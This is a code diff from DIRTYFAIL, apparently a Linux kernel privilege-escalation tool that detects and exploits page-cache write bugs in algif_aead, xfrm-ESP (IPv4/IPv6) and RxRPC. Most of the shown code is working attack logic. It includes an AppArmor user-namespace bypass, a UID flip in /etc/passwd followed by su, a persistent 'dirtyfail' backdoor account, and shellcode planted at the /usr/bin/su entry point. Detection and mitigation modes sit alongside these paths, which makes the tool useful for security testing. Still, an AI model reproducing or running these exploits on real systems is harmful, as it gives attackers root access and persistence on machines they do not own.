setenv("DIRTYFAIL_TARGET_USER", user, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init ns */ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) return DF_EXPLOIT_FAIL; + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, "0000", 4) != 0) { + log_bad("verify: page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0 (via GCM path)", user); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted (--no-shell)"); + else + log_warn("page cache may still be 
modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' in init ns β€” enter your password for REAL root", user); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” `--scan --active`. + * + * Install GCM SA with an arbitrary IV and fire ONE trigger against a + * /tmp sentinel. We skip the IV brute force: keystream XOR ciphertext + * is unpredictable but ANY byte change at sentinel[0] proves the + * kernel ran the in-place STORE. + * ---------------------------------------------------------------- */ + +df_result_t copyfail_gcm_active_probe_inner(void) +{ +#ifdef __linux__ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("gcm-probe: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + + /* Arbitrary fixed 8-byte wire IV (rfc4106 wraps it with the 4-byte + * SA salt to form the 12-byte GCM nonce). Keystream is deterministic + * given this IV + key, but we don't need to predict it for the + * probe β€” any byte change in sentinel[0] proves the STORE happened. 
*/ + static const uint8_t probe_iv[IV_LEN] = { + 0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x02, 0x03, 0x04 + }; + + if (!gcm_install_sa(probe_iv)) { + log_bad("gcm-probe: ip xfrm state add failed"); + return DF_TEST_ERROR; + } + if (!gcm_trigger(sentinel, 0, probe_iv)) { + log_bad("gcm-probe: trigger failed"); + return DF_TEST_ERROR; + } + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +df_result_t copyfail_gcm_active_probe(void) +{ + char tmpl[] = "/tmp/dirtyfail-gcm-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("gcm-probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "gcm-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("gcm-probe inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[16]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + if (after[0] != 'A') { + log_warn("ACTIVE PROBE gcm: sentinel[0] changed 'A' β†’ 0x%02x β†’ kernel is VULNERABLE", + after[0]); + return DF_VULNERABLE; + } + log_ok("ACTIVE PROBE gcm: sentinel[0] intact β€” kernel rfc4106 path appears patched"); + return DF_OK; +} diff --git 
a/modules/copy_fail_family/copyfail_gcm.h b/modules/copy_fail_family/copyfail_gcm.h new file mode 100644 index 0000000..72ebee1 --- /dev/null +++ b/modules/copy_fail_family/copyfail_gcm.h @@ -0,0 +1,61 @@ +/* + * DIRTYFAIL β€” copyfail_gcm.h + * + * Single-byte page-cache write via xfrm-ESP `rfc4106(gcm(aes))` AEAD. + * + * This module is a sibling primitive to copyfail.c (4-byte authencesn + * STORE) and dirtyfrag_esp.c (4-byte authencesn STORE via XFRM). It + * targets the SAME bug class (CVE-2026-43284 xfrm-ESP no-COW path), + * but uses `rfc4106(gcm(aes))` instead of `authencesn(...)` as the + * AEAD. That changes the primitive in two useful ways: + * + * 1. Coverage. A defender who blacklisted only `algif_aead` to stop + * Copy Fail (CVE-2026-31431) is still vulnerable here β€” neither + * algif_aead nor the authencesn template is on the path. + * + * 2. Granularity. AES-GCM is a counter-mode cipher; in-place + * "decryption" is just XORing the keystream onto the spliced + * page byte. We can land an arbitrary single byte at any file + * offset (no 4-byte alignment, no 4-byte side-effects) by + * brute-forcing the IV until keystream[0] equals + * `target_byte XOR desired_byte`. + * + * The 1-byte primitive is what makes the persistent backdoor mode + * (`backdoor.c`) feasible without alignment juggling. + * + * Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo + * (`copyfail2.c`), reimplemented here in DIRTYFAIL style. + */ + +#ifndef DIRTYFAIL_COPYFAIL_GCM_H +#define DIRTYFAIL_COPYFAIL_GCM_H + +#include "common.h" + +/* Detection: kernel + esp4 + rfc4106(gcm(aes)) availability + userns. */ +df_result_t copyfail_gcm_detect(void); + +/* End-to-end PoC: flip /etc/passwd UID via rfc4106(gcm(aes)) STORE. + * Equivalent functional outcome to copyfail_exploit() and + * dirtyfrag_esp_exploit() β€” different kernel path. 
*/ +df_result_t copyfail_gcm_exploit(bool do_shell); +df_result_t copyfail_gcm_exploit_inner(void); + +/* Low-level building block exposed for backdoor.c: + * write a single byte at `target_path` offset `target_off`. The caller + * MUST already be inside a fresh user namespace with CAP_NET_ADMIN + * (ESP SA registration prerequisite). Returns true on apparent + * success β€” caller verifies via re-read. */ +bool cfg_1byte_write(const char *target_path, + off_t target_off, + unsigned char desired_byte); + +/* Active probe: installs a GCM SA with arbitrary IV, fires ONE + * gcm_trigger against a /tmp sentinel. Skips IV brute force entirely; + * the kernel STORE writes an unpredictable byte (keystream XOR 'A') + * which still confirms the path is reachable. Returns DF_VULNERABLE + * on byte change, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */ +df_result_t copyfail_gcm_active_probe(void); +df_result_t copyfail_gcm_active_probe_inner(void); + +#endif diff --git a/modules/copy_fail_family/dirtyfail.c b/modules/copy_fail_family/dirtyfail.c new file mode 100644 index 0000000..8d5f99b --- /dev/null +++ b/modules/copy_fail_family/dirtyfail.c @@ -0,0 +1,475 @@ +/* + * DIRTYFAIL β€” main entry point + * + * A single binary that detects and (with explicit consent) demonstrates + * exploitation of: + * + * - Copy Fail CVE-2026-31431 + * - Dirty Frag (xfrm-ESP) CVE-2026-43284 + * - Dirty Frag (RxRPC) CVE-2026-43500 + * + * Default mode is detection. The exploit modes never run without + * --exploit on the command line *and* a typed-string confirmation at + * runtime. 
+ * + * Exit codes: + * 0 not vulnerable (or: exploit succeeded β€” semantically "you can + * now type `exit` and the test ran") + * 1 test error / could not determine + * 2 vulnerable + * 3 exploit attempted but did not land + * 4 preconditions not met (effectively "not vulnerable here") + * 5 exploit succeeded and a root shell was spawned + */ + +#include "common.h" +#include "copyfail.h" +#include "copyfail_gcm.h" +#include "dirtyfrag_esp.h" +#include "dirtyfrag_esp6.h" +#include "dirtyfrag_rxrpc.h" +#include "apparmor_bypass.h" +#include "backdoor.h" +#include "mitigate.h" +#include "exploit_su.h" + +#include +#include +#include + +static const char BANNER[] = +"\n" +" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— \n" +" β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ \n" +" β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ \n" +" β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ \n" +" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— \n" +" β•šβ•β•β•β•β•β• β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β•β•β•β•β•β• \n" +" Copy Fail + Dirty Frag detector & PoC\n" +" CVE-2026-31431 / 43284 / 43500\n"; + +static void usage(const char *prog) +{ + fprintf(stderr, +"Usage: %s [MODE] [OPTIONS]\n" +"\n" +"Modes (pick one; default is --scan):\n" +" --scan detect all three CVEs (no system modification)\n" +" --check-copyfail Copy Fail (CVE-2026-31431) detection only\n" +" --check-esp Dirty Frag xfrm-ESP 
(CVE-2026-43284) detection only\n" +" --check-rxrpc Dirty Frag RxRPC (CVE-2026-43500) detection only\n" +" --check-esp6 IPv6 xfrm-ESP path (CVE-2026-43284 v6) detection\n" +" --check-gcm Copy Fail GCM variant detection\n" +" --exploit-copyfail real PoC: flip /etc/passwd UID via algif_aead\n" +" --exploit-esp real PoC: flip /etc/passwd UID via xfrm-ESP (v4)\n" +" --exploit-esp6 real PoC: flip /etc/passwd UID via xfrm-ESP (v6)\n" +" --exploit-rxrpc real PoC: empty /etc/passwd root pwd via rxkad\n" +" (fcrypt brute-force + AF_RXRPC handshake forgery)\n" +" --exploit-gcm real PoC: flip /etc/passwd UID via rfc4106(gcm(aes))\n" +" single-byte primitive (works when authencesn is\n" +" blacklisted but rfc4106 isn't)\n" +" --exploit-backdoor PERSISTENT: insert dirtyfail::0:0:..:/:/bin/bash\n" +" into /etc/passwd page cache; survives shell exit\n" +" until page eviction. Use --cleanup-backdoor to revert.\n" +" --exploit-su V4bel-style: plant arch-specific shellcode at\n" +" /usr/bin/su entry point in page cache; running\n" +" su then yields a /bin/sh root shell. No PAM\n" +" dependency. x86_64 tested; aarch64 ships but is\n" +" hardware-untested (gated behind an env var).\n" +" Saves original entry-point bytes to\n" +" /var/tmp/.dirtyfail-su.state for revert via\n" +" --cleanup-su.\n" +" --cleanup evict /etc/passwd from page cache and drop_caches\n" +" --cleanup-backdoor restore /etc/passwd line from /var/tmp/.dirtyfail.state\n" +" --cleanup-su restore /usr/bin/su entry-point bytes from state file\n" +" --list-state report what (if anything) is currently planted β€”\n" +" reads /var/tmp/.dirtyfail*.state files and\n" +" describes each. Side-effect free.\n" +" --mitigate DEFENSIVE: blacklist algif_aead/esp4/esp6/rxrpc,\n" +" set apparmor_restrict_unprivileged_userns=1.\n" +" Requires root. 
Side-effect: breaks IPsec/AFS.\n" +" --cleanup-mitigate remove the modprobe/sysctl mitigation files\n" +" --version print version\n" +" --help this message\n" +"\n" +"Options:\n" +" --active in --scan / --check-* mode, do an active sentinel\n" +" STORE probe per CVE in addition to precondition\n" +" checks. Modifies /tmp sentinels only; never\n" +" touches /etc/passwd. Requires AA bypass on\n" +" hardened distros, so may take ~5-10s.\n" +" --no-shell after a successful exploit, do NOT execve `su`;\n" +" instead revert the page-cache patch and exit\n" +" --no-revert with --no-shell, also skip the auto-revert\n" +" (leaves the page cache poisoned β€” used by\n" +" tools/dirtyfail-container-escape.sh demo)\n" +" --json emit a single JSON object on stdout (--scan\n" +" only); all log output redirected to stderr.\n" +" Suitable for SIEM/fleet scanning. Implies\n" +" --no-color and suppresses the banner.\n" +" --no-color disable ANSI color in output\n" +" --aa-bypass force the AppArmor unprivileged-userns bypass\n" +" (auto-armed when restricted profile is detected)\n" +"\n" +"Exit codes:\n" +" 0 not vulnerable / clean 2 vulnerable 5 exploit succeeded\n" +" 1 test error 3 exploit failed 4 preconditions missing\n" +"\n" +"AUTHORIZED TESTING ONLY. Run only on systems you own or are explicitly\n" +"engaged to assess. 
The --exploit modes corrupt /etc/passwd in the\n" +"kernel page cache; cleanup with --cleanup or `echo 3 > /proc/sys/vm/drop_caches`.\n", + prog); +} + +enum mode { + MODE_SCAN, + MODE_CHECK_COPYFAIL, + MODE_CHECK_ESP, + MODE_CHECK_ESP6, + MODE_CHECK_RXRPC, + MODE_CHECK_GCM, + MODE_EXPLOIT_COPYFAIL, + MODE_EXPLOIT_ESP, + MODE_EXPLOIT_ESP6, + MODE_EXPLOIT_RXRPC, + MODE_EXPLOIT_GCM, + MODE_EXPLOIT_BACKDOOR, + MODE_EXPLOIT_SU, + MODE_CLEANUP, + MODE_CLEANUP_BACKDOOR, + MODE_CLEANUP_SU, + MODE_MITIGATE, + MODE_CLEANUP_MITIGATE, + MODE_LIST_STATE, + MODE_HELP, + MODE_VERSION, +}; + +#define DIRTYFAIL_VERSION "0.1.0" + +int main(int argc, char **argv) +{ + /* Pick up flags that need to survive AA-bypass fork+re-exec via env. + * The child re-execs with its own argv (stage tags only), so flags + * set in the parent's argv don't reach the child unless we propagate + * them through env vars. --json is the main case: without this, the + * child's log_* output goes to stdout and corrupts the JSON document + * the parent is building. */ + if (getenv("DIRTYFAIL_JSON")) { + dirtyfail_json = true; + dirtyfail_use_color = false; + } + + /* If we're a re-exec from the apparmor bypass dance, route to the + * stage handler immediately. Stage 1 re-execs to stage 2; stage 2 + * unshares + raises caps, then either: + * (a) DIRTYFAIL_INNER_MODE is set β†’ we're a fork-based exploit + * child. Dispatch to the inner handler and exit. Parent + * (init ns) reaps us and continues with verify + su. + * (b) Not set β†’ legacy `--aa-bypass` whole-process mode; fall + * through to the normal main() flow with rewritten argv. 
*/ + if (apparmor_bypass_is_stage(argc, argv)) { + int new_argc = argc; + char **new_argv = argv; + if (apparmor_bypass_run_stage(argc, argv, &new_argc, &new_argv) != 0) { + fprintf(stderr, "apparmor bypass stage failed\n"); + return 1; + } + const char *inner = getenv("DIRTYFAIL_INNER_MODE"); + if (inner && *inner) { + df_result_t r = DF_TEST_ERROR; + if (strcmp(inner, "esp") == 0) r = dirtyfrag_esp_exploit_inner(); + else if (strcmp(inner, "esp6") == 0) r = dirtyfrag_esp6_exploit_inner(); + else if (strcmp(inner, "rxrpc") == 0) r = dirtyfrag_rxrpc_exploit_inner(); + else if (strcmp(inner, "gcm") == 0) r = copyfail_gcm_exploit_inner(); + else if (strcmp(inner, "esp-probe") == 0) r = dirtyfrag_esp_active_probe_inner(); + else if (strcmp(inner, "esp6-probe") == 0) r = dirtyfrag_esp6_active_probe_inner(); + else if (strcmp(inner, "rxrpc-probe") == 0) r = dirtyfrag_rxrpc_active_probe_inner(); + else if (strcmp(inner, "gcm-probe") == 0) r = copyfail_gcm_active_probe_inner(); + else if (strcmp(inner, "backdoor-install") == 0) r = backdoor_install_inner(); + else if (strcmp(inner, "backdoor-cleanup") == 0) r = backdoor_cleanup_inner(); + else { + fprintf(stderr, "unknown DIRTYFAIL_INNER_MODE: %s\n", inner); + r = DF_TEST_ERROR; + } + return (int)r; + } + argc = new_argc; + argv = new_argv; + } + + enum mode m = MODE_SCAN; + bool do_shell = true; + bool aa_bypass = false; + + static const struct option opts[] = { + {"scan", no_argument, NULL, 'S'}, + {"check-copyfail", no_argument, NULL, 1 }, + {"check-esp", no_argument, NULL, 2 }, + {"check-rxrpc", no_argument, NULL, 3 }, + {"check-esp6", no_argument, NULL, 9 }, + {"check-gcm", no_argument, NULL, 10 }, + {"exploit-copyfail", no_argument, NULL, 4 }, + {"exploit-esp", no_argument, NULL, 5 }, + {"exploit-esp6", no_argument, NULL, 11 }, + {"exploit-rxrpc", no_argument, NULL, 7 }, + {"exploit-gcm", no_argument, NULL, 12 }, + {"exploit-backdoor", no_argument, NULL, 13 }, + {"cleanup", no_argument, NULL, 6 }, + 
{"cleanup-backdoor", no_argument, NULL, 14 }, + {"mitigate", no_argument, NULL, 15 }, + {"cleanup-mitigate", no_argument, NULL, 16 }, + {"active", no_argument, NULL, 17 }, + {"exploit-su", no_argument, NULL, 18 }, + {"cleanup-su", no_argument, NULL, 19 }, + {"no-revert", no_argument, NULL, 20 }, + {"json", no_argument, NULL, 21 }, + {"list-state", no_argument, NULL, 22 }, + {"no-shell", no_argument, NULL, 'n'}, + {"no-color", no_argument, NULL, 'C'}, + {"aa-bypass", no_argument, NULL, 8 }, + {"help", no_argument, NULL, 'h'}, + {"version", no_argument, NULL, 'V'}, + {0,0,0,0} + }; + + int c; + while ((c = getopt_long(argc, argv, "ShVnC", opts, NULL)) != -1) { + switch (c) { + case 'S': m = MODE_SCAN; break; + case 1 : m = MODE_CHECK_COPYFAIL; break; + case 2 : m = MODE_CHECK_ESP; break; + case 3 : m = MODE_CHECK_RXRPC; break; + case 4 : m = MODE_EXPLOIT_COPYFAIL; break; + case 5 : m = MODE_EXPLOIT_ESP; break; + case 7 : m = MODE_EXPLOIT_RXRPC; break; + case 6 : m = MODE_CLEANUP; break; + case 9 : m = MODE_CHECK_ESP6; break; + case 10 : m = MODE_CHECK_GCM; break; + case 11 : m = MODE_EXPLOIT_ESP6; break; + case 12 : m = MODE_EXPLOIT_GCM; break; + case 13 : m = MODE_EXPLOIT_BACKDOOR; break; + case 14 : m = MODE_CLEANUP_BACKDOOR; break; + case 15 : m = MODE_MITIGATE; break; + case 16 : m = MODE_CLEANUP_MITIGATE; break; + case 17 : dirtyfail_active_probes = true; break; + case 18 : m = MODE_EXPLOIT_SU; break; + case 19 : m = MODE_CLEANUP_SU; break; + case 20 : dirtyfail_no_revert = true; break; + case 21 : dirtyfail_json = true; + dirtyfail_use_color = false; + /* Propagate through fork+re-exec for AA bypass children */ + setenv("DIRTYFAIL_JSON", "1", 1); + break; + case 22 : m = MODE_LIST_STATE; break; + case 'n': do_shell = false; break; + case 'C': dirtyfail_use_color = false; break; + case 8 : aa_bypass = true; break; + case 'h': m = MODE_HELP; break; + case 'V': m = MODE_VERSION; break; + default : usage(argv[0]); return 1; + } + } + + if (m == MODE_HELP) { 
usage(argv[0]); return 0; } + if (m == MODE_VERSION) { puts("DIRTYFAIL " DIRTYFAIL_VERSION); return 0; } + + /* Exploit modes now do their OWN fork-based AA bypass internally + * (parent stays in init ns for the post-exploit `su` to drop into + * REAL init-ns root). We only arm the legacy whole-process bypass + * when the operator explicitly requests it via --aa-bypass β€” that + * path is mostly useful for debugging the bypass mechanics in + * isolation, not for actual exploitation. */ + if (aa_bypass) { + log_warn("--aa-bypass: arming legacy whole-process bypass"); + log_hint("note: exploit modes now do their own fork-based bypass; " + "this flag is for debugging only and may break su afterwards."); + if (apparmor_bypass_arm_and_relaunch(argc, argv) != 0) { + log_warn("apparmor bypass failed (%s) β€” continuing un-bypassed", + strerror(errno)); + } + } + + if (!dirtyfail_json) { + if (dirtyfail_use_color) fputs("\033[1;35m", stdout); + fputs(BANNER, stdout); + if (dirtyfail_use_color) fputs("\033[0m", stdout); + fputc('\n', stdout); + } + + df_result_t r = DF_OK; + + switch (m) { + case MODE_SCAN: { + log_step("running full scan β€” five detectors\n"); + + df_result_t a = copyfail_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t b = dirtyfrag_esp_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t b6 = dirtyfrag_esp6_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t c2 = dirtyfrag_rxrpc_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t g = copyfail_gcm_detect(); if (!dirtyfail_json) fputc('\n', stdout); + + const char *label[] = { + [DF_OK] = "not vulnerable", + [DF_TEST_ERROR] = "test error", + [DF_VULNERABLE] = "VULNERABLE", + [DF_PRECOND_FAIL] = "preconditions missing", + }; + const char *json_label[] = { + [DF_OK] = "not_vulnerable", + [DF_TEST_ERROR] = "test_error", + [DF_VULNERABLE] = "vulnerable", + [DF_PRECOND_FAIL] = "preconds_missing", + }; + + if (!dirtyfail_json) { + log_step("scan 
summary:"); + log_hint(" Copy Fail (algif_aead, CVE-2026-31431): %s", label[a & 7]); + log_hint(" Dirty Frag ESP v4 (CVE-2026-43284): %s", label[b & 7]); + log_hint(" Dirty Frag ESP v6 (CVE-2026-43284 v6): %s", label[b6 & 7]); + log_hint(" Dirty Frag RxRPC (CVE-2026-43500): %s", label[c2 & 7]); + log_hint(" Copy Fail GCM variant (xfrm rfc4106): %s", label[g & 7]); + } + + if (a == DF_VULNERABLE || b == DF_VULNERABLE || b6 == DF_VULNERABLE || + c2 == DF_VULNERABLE || g == DF_VULNERABLE) + r = DF_VULNERABLE; + else if (a == DF_TEST_ERROR || b == DF_TEST_ERROR || b6 == DF_TEST_ERROR || + c2 == DF_TEST_ERROR || g == DF_TEST_ERROR) + r = DF_TEST_ERROR; + else + r = DF_OK; + + if (dirtyfail_json) { + struct utsname u; uname(&u); + const char *summary = json_label[r & 7]; + printf("{\n"); + printf(" \"tool\": \"dirtyfail\",\n"); + printf(" \"version\": \"" DIRTYFAIL_VERSION "\",\n"); + printf(" \"hostname\": \"%s\",\n", u.nodename); + printf(" \"kernel\": \"%s\",\n", u.release); + printf(" \"machine\": \"%s\",\n", u.machine); + printf(" \"active_probes\": %s,\n", + dirtyfail_active_probes ? 
"true" : "false"); + printf(" \"results\": [\n"); + printf(" {\"cve\": \"CVE-2026-31431\", \"name\": \"copyfail\", \"status\": \"%s\"},\n", json_label[a & 7]); + printf(" {\"cve\": \"CVE-2026-43284\", \"name\": \"dirtyfrag-esp\", \"status\": \"%s\"},\n", json_label[b & 7]); + printf(" {\"cve\": \"CVE-2026-43284-v6\", \"name\": \"dirtyfrag-esp6\", \"status\": \"%s\"},\n", json_label[b6 & 7]); + printf(" {\"cve\": \"CVE-2026-43500\", \"name\": \"dirtyfrag-rxrpc\", \"status\": \"%s\"},\n", json_label[c2 & 7]); + printf(" {\"cve\": \"CVE-2026-31431-gcm\", \"name\": \"copyfail-gcm\", \"status\": \"%s\"}\n", json_label[g & 7]); + printf(" ],\n"); + printf(" \"summary\": \"%s\"\n", summary); + printf("}\n"); + } + break; + } + + case MODE_CHECK_COPYFAIL: r = copyfail_detect(); break; + case MODE_CHECK_ESP: r = dirtyfrag_esp_detect(); break; + case MODE_CHECK_ESP6: r = dirtyfrag_esp6_detect(); break; + case MODE_CHECK_RXRPC: r = dirtyfrag_rxrpc_detect(); break; + case MODE_CHECK_GCM: r = copyfail_gcm_detect(); break; + + case MODE_EXPLOIT_COPYFAIL: + log_warn("running real PoC for Copy Fail (CVE-2026-31431)"); + r = copyfail_exploit(do_shell); + break; + + case MODE_EXPLOIT_ESP: + log_warn("running real PoC for Dirty Frag xfrm-ESP (CVE-2026-43284)"); + r = dirtyfrag_esp_exploit(do_shell); + break; + + case MODE_EXPLOIT_RXRPC: + log_warn("running real PoC for Dirty Frag RxRPC (CVE-2026-43500)"); + r = dirtyfrag_rxrpc_exploit(do_shell); + break; + + case MODE_EXPLOIT_ESP6: + log_warn("running real PoC for Dirty Frag IPv6 xfrm-ESP"); + r = dirtyfrag_esp6_exploit(do_shell); + break; + + case MODE_EXPLOIT_GCM: + log_warn("running real PoC for Copy Fail GCM variant (rfc4106)"); + r = copyfail_gcm_exploit(do_shell); + break; + + case MODE_EXPLOIT_BACKDOOR: + log_warn("installing PERSISTENT backdoor user 'dirtyfail' (page-cache only)"); + r = backdoor_install(do_shell); + break; + + case MODE_CLEANUP_BACKDOOR: + r = backdoor_cleanup(); + break; + + case MODE_EXPLOIT_SU: + 
log_warn("planting x86_64 shellcode at /usr/bin/su entry point (page cache)"); + r = exploit_su_shellcode(do_shell); + break; + + case MODE_CLEANUP_SU: + r = cleanup_su_shellcode(); + break; + + case MODE_MITIGATE: + r = mitigate_apply(); + break; + + case MODE_CLEANUP_MITIGATE: + r = mitigate_revert(); + break; + + case MODE_LIST_STATE: { + log_step("--list-state: scanning /var/tmp for stashed dirtyfail state files"); + bool any = false; + if (backdoor_list_state()) any = true; + if (exploit_su_list_state()) any = true; + if (!any) { + log_ok("no dirtyfail state files present β€” system is clean"); + } else { + log_hint("(state files only describe what was planted β€” they do"); + log_hint(" not by themselves prove the page cache is still poisoned;"); + log_hint(" run `--cleanup` / `--cleanup-backdoor` / `--cleanup-su`"); + log_hint(" to evict + restore.)"); + } + r = DF_OK; + break; + } + + case MODE_CLEANUP: + log_step("evicting /etc/passwd page cache"); + if (geteuid() != 0) { + /* POSIX_FADV_DONTNEED on a read-only fd held by a non-root + * user *silently no-ops* on Linux β€” fadvise returns 0 but + * does not actually evict any pages. The only path that + * works without write access is `drop_caches`, which + * itself needs root. So warn the operator clearly. */ + log_warn("running as non-root: POSIX_FADV_DONTNEED will return 0 " + "but NOT evict any pages (kernel ignores it for readers " + "without write access). 
The page-cache STORE will persist " + "until eviction by memory pressure or reboot."); + log_warn("re-run as 'sudo dirtyfail --cleanup' to drop_caches."); + } else { + int fd = open("/etc/passwd", O_RDONLY); + if (fd >= 0) { +#ifdef POSIX_FADV_DONTNEED + posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED); +#endif + close(fd); + } + log_step("dropping caches"); + if (drop_caches()) log_ok("drop_caches OK"); + else log_warn("drop_caches failed: %s", strerror(errno)); + } + r = DF_OK; + break; + + default: + usage(argv[0]); + return 1; + } + + return (int)r; +} diff --git a/modules/copy_fail_family/dirtyfrag_esp.c b/modules/copy_fail_family/dirtyfrag_esp.c new file mode 100644 index 0000000..abb243c --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp.c @@ -0,0 +1,804 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp.c β€” Dirty Frag xfrm-ESP variant + * CVE-2026-43284 + * + * BACKGROUND + * ---------- + * In Linux, esp_input() runs the AEAD decryption in-place on the + * incoming skb. Before that, an skb whose payload sits in a frag (i.e. + * not in the linear head β€” the case that arises when userspace plants + * a page via splice()) is supposed to be cloned out into kernel-owned + * memory by skb_cow_data(). The bug: + * + * if (!skb_cloned(skb)) { + * if (!skb_is_nonlinear(skb)) { + * nfrags = 1; + * goto skip_cow; + * } else if (!skb_has_frag_list(skb)) { + * nfrags = skb_shinfo(skb)->nr_frags; + * nfrags++; + * goto skip_cow; // <-- vulnerable branch + * } + * } + * + * If the skb has frags but no frag_list, esp_input skips the COW and + * runs in-place AEAD on the user-supplied page. The same authencesn + * scratch-write that powers Copy Fail then lands at file offset + * (assoclen + cryptlen) inside that page. The 4 STOREd bytes are + * `seq_hi` from the SA's replay_esn state, which userspace controls + * via XFRMA_REPLAY_ESN_VAL on SA registration. 
+ * + * Net result: same 4-byte arbitrary-offset write into a page-cache + * page as Copy Fail, but reachable via the xfrm path *even when + * algif_aead is blacklisted as a Copy Fail mitigation*. + * + * COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker + * must enter a fresh user namespace first. This is allowed by default + * on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns). + * + * DETECTION STRATEGY + * ------------------ + * Precondition-based: we report VULNERABLE when *all* of these hold: + * - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched + * - esp4 module loadable (we don't insmod; rely on autoload) + * - unprivileged user namespace creation works + * + * Avoiding the actual primitive in detect mode keeps the system + * undisturbed (no namespaces created in the parent, no encap sockets, + * no transient SAs). The exploit path runs the full primitive for real. + * + * EXPLOIT STRATEGY + * ---------------- + * Same UID-flip as Copy Fail, but driven through xfrm: + * + * 1. fork() — parent stays in init userns to call su afterwards + * 2. child: unshare(CLONE_NEWUSER | 